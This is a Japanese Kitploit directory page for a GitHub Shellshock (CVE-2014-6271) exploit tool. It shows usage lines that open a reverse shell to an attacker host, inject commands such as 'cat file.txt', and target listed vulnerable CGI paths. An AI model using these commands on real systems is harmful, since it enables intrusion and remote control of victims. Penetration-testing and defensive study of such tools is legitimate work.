Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
-CVE-2014-6271-Shellshock-Remote-Command-Injection- — [CVE-2014-6271] Apache Shellshock リモートコマンドインジェクションツール(クイックリバースシェルとファイル閲覧用) | Kitploit
ツール/GitHubGitHub/filipstudeny/-cve-2014-6271-shellshock-remote-command-injection-
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubfilipstudeny/-cve-2014-6271-shellshock-remote-command-injection-

-CVE-2014-6271-Shellshock-Remote-Command-Injection-

[CVE-2014-6271] Apache Shellshock リモートコマンドインジェクションツール(クイックリバースシェルとファイル閲覧用)

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
314年前未レビュー

[CVE-2014-6271] Shellshock-Remote-Command-Injection

[CVE-2014-6271] Apache Shellshock リモートコマンドインジェクションツール - クイックリバースシェルとファイル閲覧用

root@kitploit:~
Shellshock Apache remote exploit

Usage:
    ./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"

Variables:
    Victim:
        rhost => Victim IP
        rport => Victim PORT 
        
    Attacker (For reverse shell):
        lhost => Attacker IP
        lport => Attacker PORT for reverse shell 
    
    Echo:
        echo => Custom command to inject
        
        Examples:
            echo="ls -la"
            echo="cat file.txt"
        
    Config:
        pages => Specific cgi vulnerable pages 
            Exploitable pages:
                [0] /cgi-sys/entropysearch.cgi",
                [1] /cgi-sys/defaultwebpage.cgi",
                [2] /cgi-mod/index.cgi",
                [3] /cgi-bin/test.cgi",
                [4] /cgi-bin-sdb/printenv            
    Payloads:
        "reverse" => (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
        "files" => Read and browse through files (Requires: rhost, echo)    
        
    Created by Filip Studený
ツールをダウンロード